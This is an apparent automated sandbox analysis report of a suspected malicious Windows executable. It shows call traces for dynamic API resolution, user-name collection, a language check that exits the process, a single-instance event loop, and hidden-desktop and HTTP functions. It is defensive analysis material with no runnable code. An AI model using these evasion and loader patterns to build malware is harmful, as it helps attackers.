                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-3329630956
                              • Opcode ID: 1e9c66860bc7a4c5b9f15bf837e7dcb4190893dfd997f13ee5247f1d022a3483
                              • Instruction ID: ac042f2227306143e75ef2ed6f3c403b76026fe8c4fe2ef53aa13104e8096453
                              • Opcode Fuzzy Hash: 1e9c66860bc7a4c5b9f15bf837e7dcb4190893dfd997f13ee5247f1d022a3483
                              • Instruction Fuzzy Hash: 6931E810B8027D7E96206BF66C66F5FBEF5FF46760B20805FF50856388C9E055018EEA
                              Function 005B29E0 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2473 5b29e0-5b2a42 GetProcessHeap RtlAllocateHeap GetUserNameA
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 005B2A0F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B2A16
                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 005B2A2A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 6bdb87c60068734ab9d6422db9f88495bbe943aeafe68328daaf8bdc30b0b6b4
                              • Instruction ID: 28991ccc7027a4380c4a811c7dac282e8e3d8df52323f165813c82bfd6dff8ce
                              • Opcode Fuzzy Hash: 6bdb87c60068734ab9d6422db9f88495bbe943aeafe68328daaf8bdc30b0b6b4
                              • Instruction Fuzzy Hash: 6CF0B4B1A40204ABC700DF88DD49F9ABBBCF744B21F00021AFA14E3280D7B8190487A5
                              Function 005B6710 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 5b6710-5b6717 634 5b6b2e-5b6bc2 LoadLibraryA * 8 633->634 635 5b671d-5b6b29 GetProcAddress * 43 633->635 636 5b6c38-5b6c3f 634->636 637 5b6bc4-5b6c33 GetProcAddress * 5 634->637 635->634 638 5b6d02-5b6d09 636->638 639 5b6c45-5b6cfd GetProcAddress * 8 636->639 637->636 640 5b6d0b-5b6d7a GetProcAddress * 5 638->640 641 5b6d7f-5b6d86 638->641 639->638 640->641 642 5b6e19-5b6e20 641->642 643 5b6d8c-5b6e14 GetProcAddress * 6 641->643 644 5b6f40-5b6f47 642->644 645 5b6e26-5b6f3b GetProcAddress * 12 642->645 643->642 646 5b6f49-5b6fb8 GetProcAddress * 5 644->646 647 5b6fbd-5b6fc4 644->647 645->644 646->647 648 5b6ff1-5b6ff8 647->648 649 5b6fc6-5b6fec GetProcAddress * 2 647->649 650 5b6ffa-5b7020 GetProcAddress * 2 648->650 651 5b7025-5b702c 648->651 649->648 650->651 652 5b711d-5b7124 651->652 653 5b7032-5b7118 GetProcAddress * 10 651->653 654 5b7182-5b7189 652->654 655 5b7126-5b717d GetProcAddress * 4 652->655 653->652 656 5b718b-5b7199 GetProcAddress 654->656 657 5b719e-5b71a5 654->657 655->654 656->657 658 5b7203 657->658 659 5b71a7-5b71fe GetProcAddress * 4 657->659 659->658
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,015F5370), ref: 005B6725
                              • GetProcAddress.KERNEL32(74DD0000,015F5390), ref: 005B673D
                              • GetProcAddress.KERNEL32(74DD0000,01609D60), ref: 005B6756
                              • GetProcAddress.KERNEL32(74DD0000,01609E38), ref: 005B676E
                              • GetProcAddress.KERNEL32(74DD0000,01609DC0), ref: 005B6786
                              • GetProcAddress.KERNEL32(74DD0000,01609D90), ref: 005B679F
                              • GetProcAddress.KERNEL32(74DD0000,015FBD90), ref: 005B67B7
                              • GetProcAddress.KERNEL32(74DD0000,0160D630), ref: 005B67CF
                              • GetProcAddress.KERNEL32(74DD0000,0160D618), ref: 005B67E8
                              • GetProcAddress.KERNEL32(74DD0000,0160D5E8), ref: 005B6800
                              • GetProcAddress.KERNEL32(74DD0000,0160D660), ref: 005B6818
                              • GetProcAddress.KERNEL32(74DD0000,015F53B0), ref: 005B6831
                              • GetProcAddress.KERNEL32(74DD0000,015F5450), ref: 005B6849
                              • GetProcAddress.KERNEL32(74DD0000,015F5270), ref: 005B6861
                              • GetProcAddress.KERNEL32(74DD0000,015F54B0), ref: 005B687A
                              • GetProcAddress.KERNEL32(74DD0000,0160D5D0), ref: 005B6892
                              • GetProcAddress.KERNEL32(74DD0000,0160D450), ref: 005B68AA
                              • GetProcAddress.KERNEL32(74DD0000,015FBFE8), ref: 005B68C3
                              • GetProcAddress.KERNEL32(74DD0000,015F54F0), ref: 005B68DB
                              • GetProcAddress.KERNEL32(74DD0000,0160D570), ref: 005B68F3
                              • GetProcAddress.KERNEL32(74DD0000,0160D468), ref: 005B690C
                              • GetProcAddress.KERNEL32(74DD0000,0160D5B8), ref: 005B6924
                              • GetProcAddress.KERNEL32(74DD0000,0160D4E0), ref: 005B693C
                              • GetProcAddress.KERNEL32(74DD0000,015F5530), ref: 005B6955
                              • GetProcAddress.KERNEL32(74DD0000,0160D558), ref: 005B696D
                              • GetProcAddress.KERNEL32(74DD0000,0160D690), ref: 005B6985
                              • GetProcAddress.KERNEL32(74DD0000,0160D588), ref: 005B699E
                              • GetProcAddress.KERNEL32(74DD0000,0160D510), ref: 005B69B6
                              • GetProcAddress.KERNEL32(74DD0000,0160D4F8), ref: 005B69CE
                              • GetProcAddress.KERNEL32(74DD0000,0160D528), ref: 005B69E7
                              • GetProcAddress.KERNEL32(74DD0000,0160D480), ref: 005B69FF
                              • GetProcAddress.KERNEL32(74DD0000,0160D6A8), ref: 005B6A17
                              • GetProcAddress.KERNEL32(74DD0000,0160D498), ref: 005B6A30
                              • GetProcAddress.KERNEL32(74DD0000,0160AC38), ref: 005B6A48
                              • GetProcAddress.KERNEL32(74DD0000,0160D5A0), ref: 005B6A60
                              • GetProcAddress.KERNEL32(74DD0000,0160D678), ref: 005B6A79
                              • GetProcAddress.KERNEL32(74DD0000,015F5550), ref: 005B6A91
                              • GetProcAddress.KERNEL32(74DD0000,0160D6F0), ref: 005B6AA9
                              • GetProcAddress.KERNEL32(74DD0000,015F5590), ref: 005B6AC2
                              • GetProcAddress.KERNEL32(74DD0000,0160D600), ref: 005B6ADA
                              • GetProcAddress.KERNEL32(74DD0000,0160D6C0), ref: 005B6AF2
                              • GetProcAddress.KERNEL32(74DD0000,015F55B0), ref: 005B6B0B
                              • GetProcAddress.KERNEL32(74DD0000,015F58D0), ref: 005B6B23
                              • LoadLibraryA.KERNEL32(0160D540,005B067A), ref: 005B6B35
                              • LoadLibraryA.KERNEL32(0160D648), ref: 005B6B46
                              • LoadLibraryA.KERNEL32(0160D6D8), ref: 005B6B58
                              • LoadLibraryA.KERNEL32(0160D4B0), ref: 005B6B6A
                              • LoadLibraryA.KERNEL32(0160D708), ref: 005B6B7B
                              • LoadLibraryA.KERNEL32(0160D720), ref: 005B6B8D
                              • LoadLibraryA.KERNEL32(0160D438), ref: 005B6B9F
                              • LoadLibraryA.KERNEL32(0160D4C8), ref: 005B6BB0
                              • GetProcAddress.KERNEL32(75290000,015F58F0), ref: 005B6BCC
                              • GetProcAddress.KERNEL32(75290000,0160D8B8), ref: 005B6BE4
                              • GetProcAddress.KERNEL32(75290000,01609548), ref: 005B6BFD
                              • GetProcAddress.KERNEL32(75290000,0160D840), ref: 005B6C15
                              • GetProcAddress.KERNEL32(75290000,015F5950), ref: 005B6C2D
                              • GetProcAddress.KERNEL32(6FD40000,015FBDB8), ref: 005B6C4D
                              • GetProcAddress.KERNEL32(6FD40000,015F5870), ref: 005B6C65
                              • GetProcAddress.KERNEL32(6FD40000,015FBE58), ref: 005B6C7E
                              • GetProcAddress.KERNEL32(6FD40000,0160D7B0), ref: 005B6C96
                              • GetProcAddress.KERNEL32(6FD40000,0160D8D0), ref: 005B6CAE
                              • GetProcAddress.KERNEL32(6FD40000,015F5610), ref: 005B6CC7
                              • GetProcAddress.KERNEL32(6FD40000,015F5970), ref: 005B6CDF
                              • GetProcAddress.KERNEL32(6FD40000,0160D960), ref: 005B6CF7
                              • GetProcAddress.KERNEL32(752C0000,015F5770), ref: 005B6D13
                              • GetProcAddress.KERNEL32(752C0000,015F5630), ref: 005B6D2B
                              • GetProcAddress.KERNEL32(752C0000,0160D900), ref: 005B6D44
                              • GetProcAddress.KERNEL32(752C0000,0160D9D8), ref: 005B6D5C
                              • GetProcAddress.KERNEL32(752C0000,015F5910), ref: 005B6D74
                              • GetProcAddress.KERNEL32(74EC0000,015FBDE0), ref: 005B6D94
                              • GetProcAddress.KERNEL32(74EC0000,015FBEA8), ref: 005B6DAC
                              • GetProcAddress.KERNEL32(74EC0000,0160D9C0), ref: 005B6DC5
                              • GetProcAddress.KERNEL32(74EC0000,015F5990), ref: 005B6DDD
                              • GetProcAddress.KERNEL32(74EC0000,015F59B0), ref: 005B6DF5
                              • GetProcAddress.KERNEL32(74EC0000,015FC010), ref: 005B6E0E
                              • GetProcAddress.KERNEL32(75BD0000,0160D858), ref: 005B6E2E
                              • GetProcAddress.KERNEL32(75BD0000,015F57D0), ref: 005B6E46
                              • GetProcAddress.KERNEL32(75BD0000,01609458), ref: 005B6E5F
                              • GetProcAddress.KERNEL32(75BD0000,0160D930), ref: 005B6E77
                              • GetProcAddress.KERNEL32(75BD0000,0160D978), ref: 005B6E8F
                              • GetProcAddress.KERNEL32(75BD0000,015F5710), ref: 005B6EA8
                              • GetProcAddress.KERNEL32(75BD0000,015F5890), ref: 005B6EC0
                              • GetProcAddress.KERNEL32(75BD0000,0160D7C8), ref: 005B6ED8
                              • GetProcAddress.KERNEL32(75BD0000,0160D768), ref: 005B6EF1
                              • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 005B6F07
                              • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 005B6F1E
                              • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 005B6F35
                              • GetProcAddress.KERNEL32(75A70000,015F5650), ref: 005B6F51
                              • GetProcAddress.KERNEL32(75A70000,0160D918), ref: 005B6F69
                              • GetProcAddress.KERNEL32(75A70000,0160D990), ref: 005B6F82
                              • GetProcAddress.KERNEL32(75A70000,0160D9A8), ref: 005B6F9A
                              • GetProcAddress.KERNEL32(75A70000,0160DA08), ref: 005B6FB2
                              • GetProcAddress.KERNEL32(75450000,015F5670), ref: 005B6FCE
                              • GetProcAddress.KERNEL32(75450000,015F5690), ref: 005B6FE6
                              • GetProcAddress.KERNEL32(75DA0000,015F56B0), ref: 005B7002
                              • GetProcAddress.KERNEL32(75DA0000,0160D7E0), ref: 005B701A
                              • GetProcAddress.KERNEL32(6F070000,015F5730), ref: 005B703A
                              • GetProcAddress.KERNEL32(6F070000,015F5850), ref: 005B7052
                              • GetProcAddress.KERNEL32(6F070000,015F58B0), ref: 005B706B
                              • GetProcAddress.KERNEL32(6F070000,0160D888), ref: 005B7083
                              • GetProcAddress.KERNEL32(6F070000,015F5750), ref: 005B709B
                              • GetProcAddress.KERNEL32(6F070000,015F5930), ref: 005B70B4
                              • GetProcAddress.KERNEL32(6F070000,015F56D0), ref: 005B70CC
                              • GetProcAddress.KERNEL32(6F070000,015F57F0), ref: 005B70E4
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 005B70FB
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 005B7112
                              • GetProcAddress.KERNEL32(75AF0000,0160D948), ref: 005B712E
                              • GetProcAddress.KERNEL32(75AF0000,01609408), ref: 005B7146
                              • GetProcAddress.KERNEL32(75AF0000,0160D9F0), ref: 005B715F
                              • GetProcAddress.KERNEL32(75AF0000,0160DA20), ref: 005B7177
                              • GetProcAddress.KERNEL32(75D90000,015F56F0), ref: 005B7193
                              • GetProcAddress.KERNEL32(6CE50000,0160D738), ref: 005B71AF
                              • GetProcAddress.KERNEL32(6CE50000,015F5790), ref: 005B71C7
                              • GetProcAddress.KERNEL32(6CE50000,0160D828), ref: 005B71E0
                              • GetProcAddress.KERNEL32(6CE50000,0160D870), ref: 005B71F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                              • API String ID: 2238633743-3468015613
                              • Opcode ID: 4f0fcc70d3d99a687a2c46db3734164a6504fc78161a11f69512551cf64900a6
                              • Instruction ID: ed7ddc1d2671fbbc5a9a4adb202916061ae8218d4d5730da4db8bf015bf22ecd
                              • Opcode Fuzzy Hash: 4f0fcc70d3d99a687a2c46db3734164a6504fc78161a11f69512551cf64900a6
                              • Instruction Fuzzy Hash: C7622DB5610206DFD7D4DF64EC9CE2637B9F788701314C91DEA5683264EB3CA880DB6A
                              Function 005AF300 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1164stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(005BD014), ref: 005AF32E
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF34C
                              • lstrlen.KERNEL32(005BD014), ref: 005AF357
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF371
                              • lstrlen.KERNEL32(005BD014), ref: 005AF37C
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF396
                              • lstrcpy.KERNEL32(00000000,005C5568), ref: 005AF3BE
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF3EC
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF422
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AF454
                              • lstrlen.KERNEL32(015F5330), ref: 005AF476
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF506
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AF52B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AF5E2
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 005AF894
                              • lstrlen.KERNEL32(01609568), ref: 005AF8C2
                              • lstrcpy.KERNEL32(00000000,01609568), ref: 005AF8EF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AF912
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF966
                              • lstrcpy.KERNEL32(00000000,01609568), ref: 005AFA28
                              • lstrcpy.KERNEL32(00000000,016094B8), ref: 005AFA58
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AFAB7
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 005AFBD5
                              • lstrlen.KERNEL32(01609448), ref: 005AFC03
                              • lstrcpy.KERNEL32(00000000,01609448), ref: 005AFC30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AFC53
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AFCA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 012326ce3e9869d7f6d5978b38db5c04a98e59c2125f2186e8da72ac04f61c73
                              • Instruction ID: 02cb2afb19d10e8b9b4c6eb3963c778f5538e9377c0549f53d66340e7d7e6278
                              • Opcode Fuzzy Hash: 012326ce3e9869d7f6d5978b38db5c04a98e59c2125f2186e8da72ac04f61c73
                              • Instruction Fuzzy Hash: 6DA24830A013069FCB64DF69C949A2ABFE4BF85714F18857DE849CB261EB35DC42CB91
                              Function 005B1BD0 Relevance: 40.7, APIs: 27, Instructions: 194stringsleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1570 5b1bd0-5b1beb call 5929a0 call 5b63c0 1575 5b1bfa-5b1c07 call 592840 1570->1575 1576 5b1bed 1570->1576 1580 5b1c09-5b1c0f lstrcpy 1575->1580 1581 5b1c15-5b1c26 GetUserDefaultLangID 1575->1581 1577 5b1bf0-5b1bf8 1576->1577 1577->1575 1577->1577 1580->1581 1582 5b1c28-5b1c2f 1581->1582 1583 5b1c3e-5b1c50 call 5b2a70 call 5b3db0 1581->1583 1582->1583 1584 5b1c36-5b1c38 ExitProcess 1582->1584 1589 5b1c6d-5b1c8c lstrlen call 592840 1583->1589 1590 5b1c52-5b1c64 call 5b29e0 call 5b3db0 1583->1590 1595 5b1ca9-5b1cc6 lstrlen call 592840 1589->1595 1596 5b1c8e-5b1c93 1589->1596 1590->1589 1603 5b1c66-5b1c67 ExitProcess 1590->1603 1604 5b1cc8-5b1cca 1595->1604 1605 5b1ce0-5b1d01 call 5b2a70 lstrlen call 592840 1595->1605 1596->1595 1598 5b1c95-5b1c97 1596->1598 1598->1595 1601 5b1c99-5b1ca3 lstrcpy lstrcat 1598->1601 1601->1595 1604->1605 1606 5b1ccc-5b1cda lstrcpy lstrcat 1604->1606 1611 5b1d03-5b1d05 1605->1611 1612 5b1d20-5b1d3a lstrlen call 592840 1605->1612 1606->1605 1611->1612 1614 5b1d07-5b1d0b 1611->1614 1617 5b1d3c-5b1d3e 1612->1617 1618 5b1d54-5b1d71 call 5b29e0 lstrlen call 592840 1612->1618 1614->1612 1616 5b1d0d-5b1d1a lstrcpy lstrcat 1614->1616 1616->1612 1617->1618 1619 5b1d40-5b1d4e lstrcpy lstrcat 1617->1619 1624 5b1d73-5b1d75 1618->1624 1625 5b1d90-5b1d95 1618->1625 1619->1618 1624->1625 1626 5b1d77-5b1d7b 1624->1626 1627 5b1d9c-5b1da8 call 592840 1625->1627 1628 5b1d97 call 592930 1625->1628 1626->1625 1630 5b1d7d-5b1d8a lstrcpy lstrcat 1626->1630 1633 5b1daa-5b1dac 1627->1633 1634 5b1db6-5b1dec call 592930 * 5 OpenEventA 1627->1634 1628->1627 1630->1625 1633->1634 1635 5b1dae-5b1db0 lstrcpy 1633->1635 1646 5b1dee 1634->1646 1647 5b1e14-5b1e28 CreateEventA call 5b1b00 call 5b01d0 1634->1647 1635->1634 1648 5b1df0-5b1e12 CloseHandle Sleep OpenEventA 1646->1648 1652 5b1e2d-5b1e36 CloseHandle ExitProcess 1647->1652 1648->1647 1648->1648
                              APIs
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602700), ref: 005B6419
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,016028E0), ref: 005B6432
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,016028B0), ref: 005B644A
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602940), ref: 005B6462
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,016095C8), ref: 005B647B
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,015F53D0), ref: 005B6493
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,015F52F0), ref: 005B64AB
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602718), ref: 005B64C4
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,016028F8), ref: 005B64DC
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602850), ref: 005B64F4
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602730), ref: 005B650D
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,015F5310), ref: 005B6525
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602748), ref: 005B653D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B1C0F
                              • GetUserDefaultLangID.KERNEL32 ref: 005B1C15
                              • ExitProcess.KERNEL32 ref: 005B1C38
                              • ExitProcess.KERNEL32 ref: 005B1C67
                              • lstrlen.KERNEL32(016093D8), ref: 005B1C74
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B1C9B
                              • lstrcat.KERNEL32(00000000,016093D8), ref: 005B1CA3
                              • lstrlen.KERNEL32(005C5160), ref: 005B1CAE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1CCE
                              • lstrcat.KERNEL32(00000000,005C5160), ref: 005B1CDA
                              • lstrlen.KERNEL32(00000000), ref: 005B1CE9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1D0F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1D1A
                              • lstrlen.KERNEL32(005C5160), ref: 005B1D25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1D42
                              • lstrcat.KERNEL32(00000000,005C5160), ref: 005B1D4E
                              • lstrlen.KERNEL32(00000000), ref: 005B1D5D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1D7F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1D8A
                                • Part of subcall function 005B29E0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 005B2A0F
                                • Part of subcall function 005B29E0: RtlAllocateHeap.NTDLL(00000000), ref: 005B2A16
                                • Part of subcall function 005B29E0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 005B2A2A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1DB0
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 005B1DE4
                              • CloseHandle.KERNEL32(00000000), ref: 005B1DF1
                              • Sleep.KERNEL32(00001770), ref: 005B1DFC
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 005B1E0A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005B1E1B
                              • CloseHandle.KERNEL32(00000000), ref: 005B1E2E
                              • ExitProcess.KERNEL32 ref: 005B1E36
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
